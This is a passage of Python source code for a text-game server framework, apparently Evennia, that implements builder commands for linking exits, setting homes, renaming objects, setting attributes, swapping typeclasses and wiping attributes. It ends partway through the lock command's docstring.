# exitshort and backshort are the last part of the exit strings,
# so we add our typeclass argument after
exitshort += exit_typeclass
backshort += exit_typeclass
roomname = "Some place"
if self.rhs:
roomname = self.rhs # this may include aliases; that's fine.
telswitch = ""
if "tel" in self.switches:
telswitch = "/teleport"
backstring = ""
if "oneway" not in self.switches:
backstring = ", %s;%s" % (backname, backshort)
# build the string we will use to call dig
digstring = "dig%s %s = %s;%s%s" % (telswitch, roomname, exitname, exitshort, backstring)
self.execute_cmd(digstring)
class CmdLink(COMMAND_DEFAULT_CLASS):
"""
link existing rooms together with exits
Usage:
link[/switches] <object> = <target>
link[/switches] <object> =
link[/switches] <object>
Switch:
twoway - connect two exits. For this to work, BOTH <object>
and <target> must be exit objects.
If <object> is an exit, set its destination to <target>. Two-way operation
instead sets the destination to the *locations* of the respective given
arguments.
The second form (a lone =) sets the destination to None (same as
the unlink command) and the third form (without =) just shows the
currently set destination.
"""
key = "@link"
locks = "cmd:perm(link) or perm(Builder)"
help_category = "Building"
def func(self):
"""Perform the link"""
caller = self.caller
if not self.args:
caller.msg("Usage: link[/twoway] <object> = <target>")
return
object_name = self.lhs
# try to search locally first
results = caller.search(object_name, quiet=True)
if len(results) > 1: # local results was a multimatch. Inform them to be more specific
_AT_SEARCH_RESULT = variable_from_module(*settings.SEARCH_AT_RESULT.rsplit(".", 1))
return _AT_SEARCH_RESULT(results, caller, query=object_name)
elif len(results) == 1: # A unique local match
obj = results[0]
else: # No matches. Search globally
obj = caller.search(object_name, global_search=True)
if not obj:
return
if self.rhs:
# this means a target name was given
target = caller.search(self.rhs, global_search=True)
if not target:
return
if target == obj:
self.caller.msg("Cannot link an object to itself.")
return
string = ""
note = "Note: %s(%s) did not have a destination set before. Make sure you linked the right thing."
if not obj.destination:
string = note % (obj.name, obj.dbref)
if "twoway" in self.switches:
if not (target.location and obj.location):
string = "To create a two-way link, %s and %s must both have a location" % (
obj,
target,
)
string += " (i.e. they cannot be rooms, but should be exits)."
self.caller.msg(string)
return
if not target.destination:
string += note % (target.name, target.dbref)
obj.destination = target.location
target.destination = obj.location
string += "\nLink created %s (in %s) <-> %s (in %s) (two-way)." % (
obj.name,
obj.location,
target.name,
target.location,
)
else:
obj.destination = target
string += "\nLink created %s -> %s (one way)." % (obj.name, target)
elif self.rhs is None:
# this means that no = was given (otherwise rhs
# would have been an empty string). So we inspect
# the home/destination on object
dest = obj.destination
if dest:
string = "%s is an exit to %s." % (obj.name, dest.name)
else:
string = "%s is not an exit. Its home location is %s." % (obj.name, obj.home)
else:
# We gave the command link 'obj = ' which means we want to
# clear destination.
if obj.destination:
obj.destination = None
string = "Former exit %s no longer links anywhere." % obj.name
else:
string = "%s had no destination to unlink." % obj.name
# give feedback
caller.msg(string.strip())
class CmdUnLink(CmdLink):
"""
remove exit-connections between rooms
Usage:
unlink <Object>
Unlinks an object, for example an exit, disconnecting
it from whatever it was connected to.
"""
# this is just a child of CmdLink
key = "unlink"
locks = "cmd:perm(unlink) or perm(Builder)"
help_key = "Building"
def func(self):
"""
All we need to do here is to set the right command
and call func in CmdLink
"""
caller = self.caller
if not self.args:
caller.msg("Usage: unlink <object>")
return
# This mimics 'link <obj> = ' which is the same as unlink
self.rhs = ""
# call the link functionality
super().func()
class CmdSetHome(CmdLink):
"""
set an object's home location
Usage:
sethome <obj> [= <home_location>]
      sethome <obj>
The "home" location is a "safety" location for objects; they
will be moved there if their current location ceases to exist. All
objects should always have a home location for this reason.
It is also a convenient target of the "home" command.
If no location is given, just view the object's home location.
"""
key = "@sethome"
locks = "cmd:perm(sethome) or perm(Builder)"
help_category = "Building"
def func(self):
"""implement the command"""
if not self.args:
string = "Usage: sethome <obj> [= <home_location>]"
self.caller.msg(string)
return
obj = self.caller.search(self.lhs, global_search=True)
if not obj:
return
if not self.rhs:
# just view
home = obj.home
if not home:
string = "This object has no home location set!"
else:
string = "%s's current home is %s(%s)." % (obj, home, home.dbref)
else:
# set a home location
new_home = self.caller.search(self.rhs, global_search=True)
if not new_home:
return
old_home = obj.home
obj.home = new_home
if old_home:
string = "Home location of %s was changed from %s(%s) to %s(%s)." % (
obj,
old_home,
old_home.dbref,
new_home,
new_home.dbref,
)
else:
string = "Home location of %s was set to %s(%s)." % (obj, new_home, new_home.dbref)
self.caller.msg(string)
class CmdListCmdSets(COMMAND_DEFAULT_CLASS):
"""
list command sets defined on an object
Usage:
cmdsets <obj>
This displays all cmdsets assigned
to a user. Defaults to yourself.
"""
key = "@cmdsets"
locks = "cmd:perm(listcmdsets) or perm(Builder)"
help_category = "Building"
def func(self):
"""list the cmdsets"""
caller = self.caller
if self.arglist:
obj = caller.search(self.arglist[0])
if not obj:
return
else:
obj = caller
string = "%s" % obj.cmdset
caller.msg(string)
class CmdName(ObjManipCommand):
"""
change the name and/or aliases of an object
Usage:
name <obj> = <newname>;alias1;alias2
Rename an object to something new. Use *obj to
rename an account.
"""
key = "@name"
aliases = ["@rename"]
locks = "cmd:perm(rename) or perm(Builder)"
help_category = "Building"
def func(self):
"""change the name"""
caller = self.caller
if not self.args:
caller.msg("Usage: name <obj> = <newname>[;alias;alias;...]")
return
obj = None
if self.lhs_objs:
objname = self.lhs_objs[0]["name"]
if objname.startswith("*"):
# account mode
obj = caller.account.search(objname.lstrip("*"))
if obj:
if self.rhs_objs[0]["aliases"]:
caller.msg("Accounts can't have aliases.")
return
newname = self.rhs
if not newname:
caller.msg("No name defined!")
return
if not (obj.access(caller, "control") or obj.access(caller, "edit")):
caller.msg("You don't have right to edit this account %s." % obj)
return
obj.username = newname
obj.save()
caller.msg("Account's name changed to '%s'." % newname)
return
# object search, also with *
obj = caller.search(objname)
if not obj:
return
if self.rhs_objs:
newname = self.rhs_objs[0]["name"]
aliases = self.rhs_objs[0]["aliases"]
else:
newname = self.rhs
aliases = None
if not newname and not aliases:
caller.msg("No names or aliases defined!")
return
if not (obj.access(caller, "control") or obj.access(caller, "edit")):
caller.msg("You don't have the right to edit %s." % obj)
return
# change the name and set aliases:
if newname:
obj.key = newname
astring = ""
if aliases:
[obj.aliases.add(alias) for alias in aliases]
astring = " (%s)" % (", ".join(aliases))
# fix for exits - we need their exit-command to change name too
if obj.destination:
obj.flush_from_cache(force=True)
caller.msg("Object's name changed to '%s'%s." % (newname, astring))
class CmdOpen(ObjManipCommand):
"""
open a new exit from the current room
Usage:
open <new exit>[;alias;alias..][:typeclass] [,<return exit>[;alias;..][:typeclass]]] = <destination>
Handles the creation of exits. If a destination is given, the exit
will point there. The <return exit> argument sets up an exit at the
destination leading back to the current room. Destination name
can be given both as a #dbref and a name, if that name is globally
unique.
"""
key = "@open"
locks = "cmd:perm(open) or perm(Builder)"
help_category = "Building"
new_obj_lockstring = "control:id({id}) or perm(Admin);delete:id({id}) or perm(Admin)"
# a custom member method to chug out exits and do checks
def create_exit(self, exit_name, location, destination, exit_aliases=None, typeclass=None):
"""
Helper function to avoid code duplication.
At this point we know destination is a valid location
"""
caller = self.caller
string = ""
# check if this exit object already exists at the location.
        # we need to ignore errors (so no automatic feedback) since we
# have to know the result of the search to decide what to do.
exit_obj = caller.search(exit_name, location=location, quiet=True, exact=True)
if len(exit_obj) > 1:
# give error message and return
caller.search(exit_name, location=location, exact=True)
return None
if exit_obj:
exit_obj = exit_obj[0]
if not exit_obj.destination:
# we are trying to link a non-exit
string = "'%s' already exists and is not an exit!\nIf you want to convert it "
string += (
"to an exit, you must assign an object to the 'destination' property first."
)
caller.msg(string % exit_name)
return None
# we are re-linking an old exit.
old_destination = exit_obj.destination
if old_destination:
string = "Exit %s already exists." % exit_name
if old_destination.id != destination.id:
# reroute the old exit.
exit_obj.destination = destination
if exit_aliases:
[exit_obj.aliases.add(alias) for alias in exit_aliases]
string += " Rerouted its old destination '%s' to '%s' and changed aliases." % (
old_destination.name,
destination.name,
)
else:
string += " It already points to the correct place."
else:
# exit does not exist before. Create a new one.
lockstring = self.new_obj_lockstring.format(id=caller.id)
if not typeclass:
typeclass = settings.BASE_EXIT_TYPECLASS
exit_obj = create.create_object(
typeclass,
key=exit_name,
location=location,
aliases=exit_aliases,
locks=lockstring,
report_to=caller,
)
if exit_obj:
# storing a destination is what makes it an exit!
exit_obj.destination = destination
string = (
""
if not exit_aliases
else " (aliases: %s)" % (", ".join([str(e) for e in exit_aliases]))
)
string = "Created new Exit '%s' from %s to %s%s." % (
exit_name,
location.name,
destination.name,
string,
)
else:
string = "Error: Exit '%s' not created." % exit_name
# emit results
caller.msg(string)
return exit_obj
def parse(self):
super().parse()
self.location = self.caller.location
if not self.args or not self.rhs:
self.caller.msg("Usage: open <new exit>[;alias...][:typeclass]"
"[,<return exit>[;alias..][:typeclass]]] "
"= <destination>")
raise InterruptCommand
if not self.location:
self.caller.msg("You cannot create an exit from a None-location.")
raise InterruptCommand
self.destination = self.caller.search(self.rhs, global_search=True)
if not self.destination:
raise InterruptCommand
self.exit_name = self.lhs_objs[0]["name"]
self.exit_aliases = self.lhs_objs[0]["aliases"]
self.exit_typeclass = self.lhs_objs[0]["option"]
def func(self):
"""
This is where the processing starts.
Uses the ObjManipCommand.parser() for pre-processing
as well as the self.create_exit() method.
"""
# Create exit
ok = self.create_exit(self.exit_name, self.location, self.destination,
self.exit_aliases, self.exit_typeclass)
if not ok:
# an error; the exit was not created, so we quit.
return
# Create back exit, if any
if len(self.lhs_objs) > 1:
back_exit_name = self.lhs_objs[1]["name"]
back_exit_aliases = self.lhs_objs[1]["aliases"]
back_exit_typeclass = self.lhs_objs[1]["option"]
self.create_exit(back_exit_name, self.destination, self.location, back_exit_aliases,
back_exit_typeclass)
def _convert_from_string(cmd, strobj):
"""
Converts a single object in *string form* to its equivalent python
type.
Python earlier than 2.6:
Handles floats, ints, and limited nested lists and dicts
(can't handle lists in a dict, for example, this is mainly due to
the complexity of parsing this rather than any technical difficulty -
if there is a need for set-ing such complex structures on the
command line we might consider adding it).
Python 2.6 and later:
Supports all Python structures through literal_eval as long as they
are valid Python syntax. If they are not (such as [test, test2], ie
without the quotes around the strings), the entire structure will
be converted to a string and a warning will be given.
We need to convert like this since all data being sent over the
telnet connection by the Account is text - but we will want to
store it as the "real" python type so we can do convenient
comparisons later (e.g. obj.db.value = 2, if value is stored as a
string this will always fail).
"""
# Use literal_eval to parse python structure exactly.
try:
return _LITERAL_EVAL(strobj)
except (SyntaxError, ValueError):
# treat as string
strobj = utils.to_str(strobj)
string = (
'|RNote: name "|r%s|R" was converted to a string. '
"Make sure this is acceptable." % strobj
)
cmd.caller.msg(string)
return strobj
except Exception as err:
string = "|RUnknown error in evaluating Attribute: {}".format(err)
return string
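
# Illustration (not part of Evennia) of the conversion rule above: valid Python
# literals become real Python objects, anything else is kept as a plain string
# (the real command additionally warns the caller about the fallback).
def _demo_literal_conversion():
    from ast import literal_eval
    assert literal_eval("[1, 2, 'three']") == [1, 2, "three"]
    assert literal_eval("42") == 42
    try:
        literal_eval("[test, test2]")   # bare names, not quoted strings
    except (SyntaxError, ValueError):
        pass                            # -> stored as the string "[test, test2]"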
class CmdSetAttribute(ObjManipCommand):
"""
set attribute on an object or account
Usage:
set[/switch] <obj>/<attr>[:category] = <value>
set[/switch] <obj>/<attr>[:category] = # delete attribute
set[/switch] <obj>/<attr>[:category] # view attribute
set[/switch] *<account>/<attr>[:category] = <value>
Switch:
edit: Open the line editor (string values only)
script: If we're trying to set an attribute on a script
channel: If we're trying to set an attribute on a channel
account: If we're trying to set an attribute on an account
room: Setting an attribute on a room (global search)
exit: Setting an attribute on an exit (global search)
char: Setting an attribute on a character (global search)
character: Alias for char, as above.
Example:
set self/foo = "bar"
set/delete self/foo
set self/foo = $dbref(#53)
Sets attributes on objects. The second example form above clears a
previously set attribute while the third form inspects the current value of
the attribute (if any). The last one (with the star) is a shortcut for
operating on a player Account rather than an Object.
    If you want <value> to be an object, use $dbref(#dbref) or
$search(key) to assign it. You need control or edit access to
the object you are adding.
The most common data to save with this command are strings and
numbers. You can however also set Python primitives such as lists,
dictionaries and tuples on objects (this might be important for
the functionality of certain custom objects). This is indicated
by you starting your value with one of |c'|n, |c"|n, |c(|n, |c[|n
or |c{ |n.
Once you have stored a Python primitive as noted above, you can include
|c[<key>]|n in <attr> to reference nested values in e.g. a list or dict.
Remember that if you use Python primitives like this, you must
write proper Python syntax too - notably you must include quotes
around your strings or you will get an error.
"""
key = "@set"
locks = "cmd:perm(set) or perm(Builder)"
help_category = "Building"
nested_re = re.compile(r"\[.*?\]")
not_found = object()
def check_obj(self, obj):
"""
This may be overridden by subclasses in case restrictions need to be
placed on whether certain objects can have attributes set by certain
accounts.
This function is expected to display its own error message.
Returning False will abort the command.
"""
return True
def check_attr(self, obj, attr_name, category):
"""
This may be overridden by subclasses in case restrictions need to be
placed on what attributes can be set by who beyond the normal lock.
        This function is expected to display its own error message. It is
run once for every attribute that is checked, blocking only those
attributes which are not permitted and letting the others through.
"""
return attr_name
def split_nested_attr(self, attr):
"""
Yields tuples of (possible attr name, nested keys on that attr).
        For performance, this is biased to the deepest match, but allows compatibility
with older attrs that might have been named with `[]`'s.
> list(split_nested_attr("nested['asdf'][0]"))
[
('nested', ['asdf', 0]),
("nested['asdf']", [0]),
("nested['asdf'][0]", []),
]
"""
quotes = "\"'"
def clean_key(val):
val = val.strip("[]")
if val[0] in quotes:
return val.strip(quotes)
if val[0] == LIST_APPEND_CHAR:
# List insert/append syntax
return val
try:
return int(val)
except ValueError:
return val
parts = self.nested_re.findall(attr)
base_attr = ""
if parts:
base_attr = attr[: attr.find(parts[0])]
for index, part in enumerate(parts):
yield (base_attr, [clean_key(p) for p in parts[index:]])
base_attr += part
yield (attr, [])
def do_nested_lookup(self, value, *keys):
result = value
for key in keys:
try:
result = result.__getitem__(key)
except (IndexError, KeyError, TypeError):
return self.not_found
return result
def view_attr(self, obj, attr, category):
"""
Look up the value of an attribute and return a string displaying it.
"""
nested = False
for key, nested_keys in self.split_nested_attr(attr):
nested = True
if obj.attributes.has(key):
val = obj.attributes.get(key)
val = self.do_nested_lookup(val, *nested_keys)
if val is not self.not_found:
return f"\nAttribute {obj.name}/|w{attr}|n [category:{category}] = {val}"
error = f"\nAttribute {obj.name}/|w{attr} [category:{category}] does not exist."
if nested:
error += " (Nested lookups attempted)"
return error
def rm_attr(self, obj, attr, category):
"""
Remove an attribute from the object, or a nested data structure, and report back.
"""
nested = False
for key, nested_keys in self.split_nested_attr(attr):
nested = True
if obj.attributes.has(key, category):
if nested_keys:
del_key = nested_keys[-1]
val = obj.attributes.get(key, category=category)
deep = self.do_nested_lookup(val, *nested_keys[:-1])
if deep is not self.not_found:
try:
del deep[del_key]
except (IndexError, KeyError, TypeError):
continue
return f"\nDeleted attribute {obj.name}/|w{attr}|n [category:{category}]."
else:
exists = obj.attributes.has(key, category)
if exists:
obj.attributes.remove(attr, category=category)
return f"\nDeleted attribute {obj.name}/|w{attr}|n [category:{category}]."
else:
return (f"\nNo attribute {obj.name}/|w{attr}|n [category: {category}] "
"was found to delete.")
error = f"\nNo attribute {obj.name}/|w{attr}|n [category: {category}] was found to delete."
if nested:
error += " (Nested lookups attempted)"
return error
def set_attr(self, obj, attr, value, category):
done = False
for key, nested_keys in self.split_nested_attr(attr):
if obj.attributes.has(key, category) and nested_keys:
acc_key = nested_keys[-1]
lookup_value = obj.attributes.get(key, category)
deep = self.do_nested_lookup(lookup_value, *nested_keys[:-1])
if deep is not self.not_found:
# To support appending and inserting to lists
# a key that starts with LIST_APPEND_CHAR will insert a new item at that
# location, and move the other elements down.
# Using LIST_APPEND_CHAR alone will append to the list
if isinstance(acc_key, str) and acc_key[0] == LIST_APPEND_CHAR:
try:
if len(acc_key) > 1:
where = int(acc_key[1:])
deep.insert(where, value)
else:
deep.append(value)
except (ValueError, AttributeError):
pass
else:
value = lookup_value
attr = key
done = True
break
# List magic failed, just use like a key/index
try:
deep[acc_key] = value
except TypeError as err:
# Tuples can't be modified
return f"\n{err} - {deep}"
value = lookup_value
attr = key
done = True
break
verb = "Modified" if obj.attributes.has(attr) else "Created"
try:
if not done:
obj.attributes.add(attr, value, category)
return f"\n{verb} attribute {obj.name}/|w{attr}|n [category:{category}] = {value}"
except SyntaxError:
# this means literal_eval tried to parse a faulty string
return (
"\n|RCritical Python syntax error in your value. Only "
"primitive Python structures are allowed.\nYou also "
"need to use correct Python syntax. Remember especially "
"to put quotes around all strings inside lists and "
"dicts.|n"
)
@interactive
def edit_handler(self, obj, attr, caller):
"""Activate the line editor"""
def load(caller):
"""Called for the editor to load the buffer"""
try:
old_value = obj.attributes.get(attr, raise_exception=True)
except AttributeError:
# we set empty buffer on nonexisting Attribute because otherwise
# we'd always have the string "None" in the buffer to start with
old_value = ''
return str(old_value) # we already confirmed we are ok with this
def save(caller, buf):
"""Called when editor saves its buffer."""
obj.attributes.add(attr, buf)
caller.msg("Saved Attribute %s." % attr)
# check non-strings before activating editor
try:
old_value = obj.attributes.get(attr, raise_exception=True)
if not isinstance(old_value, str):
answer = yield(
f"|rWarning: Attribute |w{attr}|r is of type |w{type(old_value).__name__}|r. "
"\nTo continue editing, it must be converted to (and saved as) a string. "
"Continue? [Y]/N?")
if answer.lower() in ('n', 'no'):
self.caller.msg("Aborted edit.")
return
except AttributeError:
pass
# start the editor
EvEditor(self.caller, load, save, key=f"{obj}/{attr}")
def search_for_obj(self, objname):
"""
Searches for an object matching objname. The object may be of different typeclasses.
Args:
objname: Name of the object we're looking for
Returns:
A typeclassed object, or None if nothing is found.
"""
from evennia.utils.utils import variable_from_module
_AT_SEARCH_RESULT = variable_from_module(*settings.SEARCH_AT_RESULT.rsplit(".", 1))
caller = self.caller
if objname.startswith("*") or "account" in self.switches:
found_obj = caller.search_account(objname.lstrip("*"))
elif "script" in self.switches:
found_obj = _AT_SEARCH_RESULT(search.search_script(objname), caller)
elif "channel" in self.switches:
found_obj = _AT_SEARCH_RESULT(search.search_channel(objname), caller)
else:
global_search = True
if "char" in self.switches or "character" in self.switches:
typeclass = settings.BASE_CHARACTER_TYPECLASS
elif "room" in self.switches:
typeclass = settings.BASE_ROOM_TYPECLASS
elif "exit" in self.switches:
typeclass = settings.BASE_EXIT_TYPECLASS
else:
global_search = False
typeclass = None
found_obj = caller.search(objname, global_search=global_search, typeclass=typeclass)
return found_obj
def func(self):
"""Implement the set attribute - a limited form of py."""
caller = self.caller
if not self.args:
caller.msg("Usage: set obj/attr[:category] = value. Use empty value to clear.")
return
# get values prepared by the parser
value = self.rhs
objname = self.lhs_objattr[0]["name"]
attrs = self.lhs_objattr[0]["attrs"]
category = self.lhs_objs[0].get("option") # None if unset
obj = self.search_for_obj(objname)
if not obj:
return
if not self.check_obj(obj):
return
result = []
if "edit" in self.switches:
# edit in the line editor
if not (obj.access(self.caller, "control") or obj.access(self.caller, "edit")):
caller.msg("You don't have permission to edit %s." % obj.key)
return
if len(attrs) > 1:
caller.msg("The Line editor can only be applied " "to one attribute at a time.")
return
if not attrs:
caller.msg("Use `set/edit <objname>/<attr>` to define the Attribute to edit.\nTo "
"edit the current room description, use `set/edit here/desc` (or "
"use the `desc` command).")
return
self.edit_handler(obj, attrs[0], caller)
return
if not value:
if self.rhs is None:
# no = means we inspect the attribute(s)
if not attrs:
attrs = [attr.key for attr in obj.attributes.get(category=None)]
for attr in attrs:
if not self.check_attr(obj, attr, category):
continue
result.append(self.view_attr(obj, attr, category))
# we view it without parsing markup.
self.caller.msg("".join(result).strip(), options={"raw": True})
return
else:
# deleting the attribute(s)
if not (obj.access(self.caller, "control") or obj.access(self.caller, "edit")):
caller.msg("You don't have permission to edit %s." % obj.key)
return
for attr in attrs:
if not self.check_attr(obj, attr, category):
continue
result.append(self.rm_attr(obj, attr, category))
else:
# setting attribute(s). Make sure to convert to real Python type before saving.
# add support for $dbref() and $search() in set argument
global _ATTRFUNCPARSER
if not _ATTRFUNCPARSER:
_ATTRFUNCPARSER = funcparser.FuncParser(
{"dbref": funcparser.funcparser_callable_search,
"search": funcparser.funcparser_callable_search}
)
if not (obj.access(self.caller, "control") or obj.access(self.caller, "edit")):
caller.msg("You don't have permission to edit %s." % obj.key)
return
for attr in attrs:
if not self.check_attr(obj, attr, category):
continue
# from evennia import set_trace;set_trace()
parsed_value = _ATTRFUNCPARSER.parse(value, return_str=False, caller=caller)
if hasattr(parsed_value, "access"):
# if this is an object we must have the right to read it, if so,
# we will not convert it to a string
if not (parsed_value.access(caller, "control")
or parsed_value.access(self.caller, "edit")):
caller.msg("You don't have permission to set "
f"object with identifier '{value}'.")
continue
value = parsed_value
else:
value = _convert_from_string(self, value)
result.append(self.set_attr(obj, attr, value, category))
# send feedback
caller.msg("".join(result).strip("\n"))
class CmdTypeclass(COMMAND_DEFAULT_CLASS):
"""
set or change an object's typeclass
Usage:
typeclass[/switch] <object> [= typeclass.path]
typeclass/prototype <object> = prototype_key
typeclasses or typeclass/list/show [typeclass.path]
swap - this is a shorthand for using /force/reset flags.
update - this is a shorthand for using the /force/update flags.
Switch:
show, examine - display the current typeclass of object (default) or, if
given a typeclass path, show the docstring of that typeclass.
update - *only* re-run at_object_creation on this object
meaning locks or other properties set later may remain.
reset - clean out *all* the attributes and properties on the
object - basically making this a new clean object. This will also
reset cmdsets!
force - change to the typeclass also if the object
already has a typeclass of the same name.
list - show available typeclasses. Only typeclasses in modules actually
imported or used from somewhere in the code will show up here
(those typeclasses are still available if you know the path)
prototype - clean and overwrite the object with the specified
prototype key - effectively making a whole new object.
Example:
type button = examples.red_button.RedButton
type/prototype button=a red button
If the typeclass_path is not given, the current object's typeclass is
assumed.
View or set an object's typeclass. If setting, the creation hooks of the
new typeclass will be run on the object. If you have clashing properties on
the old class, use /reset. By default you are protected from changing to a
typeclass of the same name as the one you already have - use /force to
override this protection.
The given typeclass must be identified by its location using python
dot-notation pointing to the correct module and class. If no typeclass is
given, or there are errors in the path or the new typeclass, the old typeclass
is kept. The location of the typeclass
module is searched from the default typeclass directory, as defined in the
server settings.
"""
key = "@typeclass"
aliases = ["@type", "@parent", "@swap", "@update", "@typeclasses"]
switch_options = ("show", "examine", "update", "reset", "force", "list", "prototype")
locks = "cmd:perm(typeclass) or perm(Builder)"
help_category = "Building"
def _generic_search(self, query, typeclass_path):
caller = self.caller
if typeclass_path:
# make sure we search the right database table
try:
new_typeclass = class_from_module(typeclass_path)
except ImportError:
# this could be a prototype and not a typeclass at all
return caller.search(query)
dbclass = new_typeclass.__dbclass__
if caller.__dbclass__ == dbclass:
# object or account match
obj = caller.search(query)
if not obj:
return
elif (self.account and self.account.__dbclass__ == dbclass):
# applying account while caller is object
caller.msg(f"Trying to search {new_typeclass} with query '{self.lhs}'.")
obj = self.account.search(query)
if not obj:
return
elif hasattr(caller, "puppet") and caller.puppet.__dbclass__ == dbclass:
# applying object while caller is account
caller.msg(f"Trying to search {new_typeclass} with query '{self.lhs}'.")
obj = caller.puppet.search(query)
if not obj:
return
else:
# other mismatch between caller and specified typeclass
caller.msg(f"Trying to search {new_typeclass} with query '{self.lhs}'.")
obj = new_typeclass.search(query)
if not obj:
if isinstance(obj, list):
caller.msg(f"Could not find {new_typeclass} with query '{self.lhs}'.")
return
else:
# no rhs, use caller's typeclass
obj = caller.search(query)
if not obj:
return
return obj
def func(self):
"""Implements command"""
caller = self.caller
if "list" in self.switches or self.cmdname in ('typeclasses', '@typeclasses'):
tclasses = get_all_typeclasses()
contribs = [key for key in sorted(tclasses) if key.startswith("evennia.contrib")] or [
"<None loaded>"
]
core = [
key for key in sorted(tclasses) if key.startswith("evennia") and key not in contribs
] or ["<None loaded>"]
game = [key for key in sorted(tclasses) if not key.startswith("evennia")] or [
"<None loaded>"
]
string = (
"|wCore typeclasses|n\n"
" {core}\n"
"|wLoaded Contrib typeclasses|n\n"
" {contrib}\n"
"|wGame-dir typeclasses|n\n"
" {game}"
).format(
core="\n ".join(core), contrib="\n ".join(contribs), game="\n ".join(game)
)
EvMore(caller, string, exit_on_lastpage=True)
return
if not self.args:
caller.msg("Usage: %s <object> [= typeclass]" % self.cmdstring)
return
if "show" in self.switches or "examine" in self.switches:
oquery = self.lhs
obj = caller.search(oquery, quiet=True)
if not obj:
# no object found to examine, see if it's a typeclass-path instead
tclasses = get_all_typeclasses()
matches = [
(key, tclass) for key, tclass in tclasses.items() if key.endswith(oquery)
]
nmatches = len(matches)
if nmatches > 1:
caller.msg(
"Multiple typeclasses found matching {}:\n {}".format(
oquery, "\n ".join(tup[0] for tup in matches)
)
)
elif not matches:
caller.msg("No object or typeclass path found to match '{}'".format(oquery))
else:
# one match found
caller.msg(
"Docstring for typeclass '{}':\n{}".format(oquery, matches[0][1].__doc__)
)
else:
# do the search again to get the error handling in case of multi-match
obj = caller.search(oquery)
if not obj:
return
caller.msg(
"{}'s current typeclass is '{}.{}'".format(
obj.name, obj.__class__.__module__, obj.__class__.__name__
)
)
return
obj = self._generic_search(self.lhs, self.rhs)
if not obj:
return
if not hasattr(obj, "__dbclass__"):
string = "%s is not a typed object." % obj.name
caller.msg(string)
return
new_typeclass = self.rhs or obj.path
prototype = None
if "prototype" in self.switches:
key = self.rhs
prototype = protlib.search_prototype(key=key)
if len(prototype) > 1:
caller.msg(
"More than one match for {}:\n{}".format(
key, "\n".join(proto.get("prototype_key", "") for proto in prototype)
)
)
return
elif prototype:
# one match
prototype = prototype[0]
else:
# no match
caller.msg("No prototype '{}' was found.".format(key))
return
new_typeclass = prototype["typeclass"]
self.switches.append("force")
if "show" in self.switches or "examine" in self.switches:
string = "%s's current typeclass is %s." % (obj.name, obj.__class__)
caller.msg(string)
return
if self.cmdstring in ("swap", "@swap"):
self.switches.append("force")
self.switches.append("reset")
elif self.cmdstring in ("update", "@update"):
self.switches.append("force")
self.switches.append("update")
if not (obj.access(caller, "control") or obj.access(caller, "edit")):
caller.msg("You are not allowed to do that.")
return
if not hasattr(obj, "swap_typeclass"):
caller.msg("This object cannot have a type at all!")
return
is_same = obj.is_typeclass(new_typeclass, exact=True)
if is_same and "force" not in self.switches:
string = (f"{obj.name} already has the typeclass '{new_typeclass}'. "
"Use /force to override.")
else:
update = "update" in self.switches
reset = "reset" in self.switches
hooks = "at_object_creation" if update and not reset else "all"
old_typeclass_path = obj.typeclass_path
# special prompt for the user in cases where we want
# to confirm changes.
if "prototype" in self.switches:
diff, _ = spawner.prototype_diff_from_object(prototype, obj)
txt = spawner.format_diff(diff)
prompt = (
"Applying prototype '%s' over '%s' will cause the follow changes:\n%s\n"
% (prototype["key"], obj.name, txt)
)
if not reset:
prompt += "\n|yWARNING:|n Use the /reset switch to apply the prototype over a blank state."
prompt += "\nAre you sure you want to apply these changes [yes]/no?"
answer = yield (prompt)
if answer and answer in ("no", "n"):
caller.msg("Canceled: No changes were applied.")
return
# we let this raise exception if needed
obj.swap_typeclass(
new_typeclass, clean_attributes=reset, clean_cmdsets=reset, run_start_hooks=hooks
)
if "prototype" in self.switches:
modified = spawner.batch_update_objects_with_prototype(
prototype, objects=[obj], caller=self.caller)
prototype_success = modified > 0
if not prototype_success:
caller.msg("Prototype %s failed to apply." % prototype["key"])
if is_same:
string = "%s updated its existing typeclass (%s).\n" % (obj.name, obj.path)
else:
string = "%s changed typeclass from %s to %s.\n" % (
obj.name,
old_typeclass_path,
obj.typeclass_path,
)
if update:
string += "Only the at_object_creation hook was run (update mode)."
else:
string += "All object creation hooks were run."
if reset:
string += " All old attributes where deleted before the swap."
else:
string += " Attributes set before swap were not removed."
if "prototype" in self.switches and prototype_success:
string += (
" Prototype '%s' was successfully applied over the object type."
% prototype["key"]
)
caller.msg(string)
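# Illustrative sketch, not part of the original module: the switch-to-argument
# mapping used in CmdTypeclass.func above, isolated as a pure helper. The tuple
# ordering mirrors the keyword arguments passed to obj.swap_typeclass().
def _example_swap_arguments(switches):
    """Return (clean_attributes, clean_cmdsets, run_start_hooks) for a switch list."""
    update = "update" in switches
    reset = "reset" in switches
    hooks = "at_object_creation" if update and not reset else "all"
    return reset, reset, hooks

# _example_swap_arguments(["force", "update"]) -> (False, False, "at_object_creation")
# _example_swap_arguments(["force", "reset"])  -> (True, True, "all")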
class CmdWipe(ObjManipCommand):
"""
clear all attributes from an object
Usage:
wipe <object>[/<attr>[/<attr>...]]
Example:
wipe box
wipe box/colour
Wipes all of an object's attributes, or optionally only those attributes
listed after the object name.
"""
key = "@wipe"
locks = "cmd:perm(wipe) or perm(Builder)"
help_category = "Building"
def func(self):
"""
inp is the dict produced in ObjManipCommand.parse()
"""
caller = self.caller
if not self.args:
caller.msg("Usage: wipe <object>[/<attr>/<attr>...]")
return
# get the attributes set by our custom parser
objname = self.lhs_objattr[0]["name"]
attrs = self.lhs_objattr[0]["attrs"]
obj = caller.search(objname)
if not obj:
return
if not (obj.access(caller, "control") or obj.access(caller, "edit")):
caller.msg("You are not allowed to do that.")
return
if not attrs:
# wipe everything
obj.attributes.clear()
string = "Wiped all attributes on %s." % obj.name
else:
for attrname in attrs:
obj.attributes.remove(attrname)
string = "Wiped attributes %s on %s."
string = string % (",".join(attrs), obj.name)
caller.msg(string)
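# Illustrative sketch, not part of the original module: the two wipe branches in
# CmdWipe.func above, written against a plain dict standing in for an object's
# attribute store (an assumption made to keep the sketch standalone).
def _example_wipe(attr_store, names=None):
    """Clear the whole store, or remove only the named attributes; return what was removed."""
    if not names:
        removed = sorted(attr_store)
        attr_store.clear()
        return removed
    for name in names:
        attr_store.pop(name, None)
    return list(names)

# store = {"colour": "red", "size": 3}
# _example_wipe(store, ["colour"]) -> ["colour"]; store is now {"size": 3}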
class CmdLock(ObjManipCommand):
"""
assign a lock definition to an object
Usage:
lock <object or *account>[ = <lockstring>]
or
lock[/switch] <object or *account>/<access_type>
Switch:
del - delete given access type
view - view lock associated with given access type (default)
If no lockstring is given, shows all locks on
object.
Lockstring is of the form
